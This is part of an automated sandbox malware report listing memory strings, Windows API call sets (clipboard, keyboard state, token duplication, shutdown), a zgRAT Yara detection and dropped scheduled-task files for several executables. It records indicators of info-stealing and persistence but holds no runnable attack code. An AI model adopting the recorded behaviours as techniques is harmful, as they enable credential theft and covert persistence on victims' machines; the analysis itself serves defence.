                                Source: 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: 2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: 2531414c80.exeString found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300158551.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2324847238.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306724573.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301470542.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2299159768.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304704157.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300712531.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2322536020.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2305456630.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/FX
                                Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                Source: MPGPH131.exe, 00000014.00000003.2351242676.00000000079D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300158551.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2324847238.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000002.2506556496.0000000007E40000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306724573.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2301470542.0000000007E49000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2299159768.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304704157.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2300712531.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2322536020.0000000007E46000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2305456630.0000000007E44000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/_1
                                Source: 2531414c80.exe, 00000008.00000002.2516925001.0000000007BD8000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000002.2530843183.0000000000B62000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2365629446.0000000000B62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/ata
                                Source: 2531414c80.exe, 00000008.00000003.2246698815.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2263027375.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250377410.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242976435.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2237987811.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2250022722.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2236789799.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2262315779.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2252002938.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2248838364.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242573192.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2251127325.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000002.2516925001.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259361642.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2253196095.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2245014329.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2259948255.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2258255190.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2243359336.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2257231941.0000000007C3B000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2242286156.0000000007C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                Source: MPGPH131.exe, 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/r
                                Source: b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2488602462.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2492388851.0000000003ECC000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2446883487.0000000003E8F000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000003.2447086415.0000000003EBD000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2342118247.00000000079E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account
                                Source: b3168c3d9b.exe, 0000000F.00000003.2491026647.0000000003F53000.00000004.00000020.00020000.00000000.sdmp, b3168c3d9b.exe, 0000000F.00000002.2498371280.0000000003F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountJ_
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_0014EAFF
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_0014ED6A
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0014EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,4_2_0014EAFF
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,4_2_0013AB9C
                                Source: b3168c3d9b.exe, 00000004.00000003.2348077262.0000000003876000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _WINAPI_GETRAWINPUTDATAmemstr_fa19ae17-4
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00169576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_00169576

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPEDMatched rule: Detects zgRAT Author: ditekSHen
                                .NET source code contains very large array initializations
                                Source: swiiiii[1].exe.44.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 297472
                                Source: swiiiii.exe.44.dr, RemoteObjects.csLarge array initialization: RemoteObjects: array initializer size 297472
                                Binary is likely a compiled AutoIt script file
                                Source: b3168c3d9b.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                                Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_5582b073-d
                                Source: b3168c3d9b.exe, 00000004.00000000.2070491358.0000000000192000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_148a7222-4
                                Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_88050bc7-f
                                Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3908aaf6-9
                                PE file contains section with special chars
                                Source: file.exeStatic PE information: section name:
                                Source: file.exeStatic PE information: section name: .idata
                                Source: file.exeStatic PE information: section name:
                                Source: explorta.exe.0.drStatic PE information: section name:
                                Source: explorta.exe.0.drStatic PE information: section name: .idata
                                Source: explorta.exe.0.drStatic PE information: section name:
                                Source: amert[1].exe.2.drStatic PE information: section name:
                                Source: amert[1].exe.2.drStatic PE information: section name: .idata
                                Source: amert[1].exe.2.drStatic PE information: section name:
                                Source: amert.exe.2.drStatic PE information: section name:
                                Source: amert.exe.2.drStatic PE information: section name: .idata
                                Source: amert.exe.2.drStatic PE information: section name:
                                Source: random[1].exe0.2.drStatic PE information: section name:
                                Source: random[1].exe0.2.drStatic PE information: section name: .idata
                                Source: random[1].exe0.2.drStatic PE information: section name:
                                Source: 2531414c80.exe.2.drStatic PE information: section name:
                                Source: 2531414c80.exe.2.drStatic PE information: section name: .idata
                                Source: 2531414c80.exe.2.drStatic PE information: section name:
                                Source: sarra[1].exe.2.drStatic PE information: section name:
                                Source: sarra[1].exe.2.drStatic PE information: section name: .idata
                                Source: sarra[1].exe.2.drStatic PE information: section name:
                                Source: RageMP131.exe.8.drStatic PE information: section name:
                                Source: RageMP131.exe.8.drStatic PE information: section name: .idata
                                Source: RageMP131.exe.8.drStatic PE information: section name:
                                Source: MPGPH131.exe.8.drStatic PE information: section name:
                                Source: MPGPH131.exe.8.drStatic PE information: section name: .idata
                                Source: MPGPH131.exe.8.drStatic PE information: section name:
                                Source: chrosha.exe.26.drStatic PE information: section name:
                                Source: chrosha.exe.26.drStatic PE information: section name: .idata
                                Source: chrosha.exe.26.drStatic PE information: section name:
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013D5EB: CreateFileW,DeviceIoControl,CloseHandle,4_2_0013D5EB
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00131201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,4_2_00131201
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0013E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,4_2_0013E8F6
                                Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\explorta.jobJump to behavior
                                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1000012001\amert.exeFile created: C:\Windows\Tasks\chrosha.job
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D703B2_2_005D703B
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D24802_2_005D2480
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D29182_2_005D2918
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005C76332_2_005C7633
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D6F1B2_2_005D6F1B
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D67C92_2_005D67C9
                                Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exeCode function: 2_2_005D83802_2_005D8380
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001420464_2_00142046
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D80604_2_000D8060
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001382984_2_00138298
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0010E4FF4_2_0010E4FF
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0010676B4_2_0010676B
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_001648734_2_00164873
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000FCAA04_2_000FCAA0
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000DCAF04_2_000DCAF0
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000ECC394_2_000ECC39
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00106DD94_2_00106DD9
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000EB1194_2_000EB119
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D91C04_2_000D91C0
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F13944_2_000F1394
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F17064_2_000F1706
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F781B4_2_000F781B
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000D79204_2_000D7920
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000E997D4_2_000E997D
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F19B04_2_000F19B0
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F7A4A4_2_000F7A4A
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F1C774_2_000F1C77
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F7CA74_2_000F7CA7
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_0015BE444_2_0015BE44
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00109EEE4_2_00109EEE
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_000F1F324_2_000F1F32
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008680808_2_00868080
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_007B001D8_2_007B001D
                                Source: C:\Users\user\AppData\Local\Temp\1000009001\2531414c80.exeCode function: 8_2_008061D08_2_008061D0
